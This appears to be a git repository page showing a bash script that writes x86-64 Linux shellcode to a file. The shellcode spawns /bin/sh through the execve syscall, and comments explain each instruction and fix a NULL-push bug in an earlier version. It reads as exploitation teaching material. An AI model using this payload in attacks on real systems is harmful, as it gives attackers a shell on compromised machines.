blob: 63fa49118dabe539dc4e23b7d50f6d9bf73894ee (
plain) (
blame)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
|
#!/bin/bash
echo -e "\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\xb0\x3b\x0f\x05" > shellcode
# This shellcode translates as follows:
#
# "\x48\x31\xd2" // xor %rdx, %rdx
# "\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68" // mov $0x68732f6e69622f2f, %rbx
# "\x48\xc1\xeb\x08" // shr $0x8, %rbx
# "\x53" // push %rbx
# "\x48\x89\xe7" // mov %rsp, %rdi
# "\x52" // push %rdx // There is an error in the "original", push %rax will push
# // some random stuff on the stack, instead of NULL, which will
# // cause the execve to fail with EFAULT (-14). See man execve.
# "\x57" // push %rdi
# "\x48\x89\xe6" // mov %rsp, %rsi
# "\xb0\x3b" // mov $0x3b, %al
# "\x0f\x05" // syscall
|
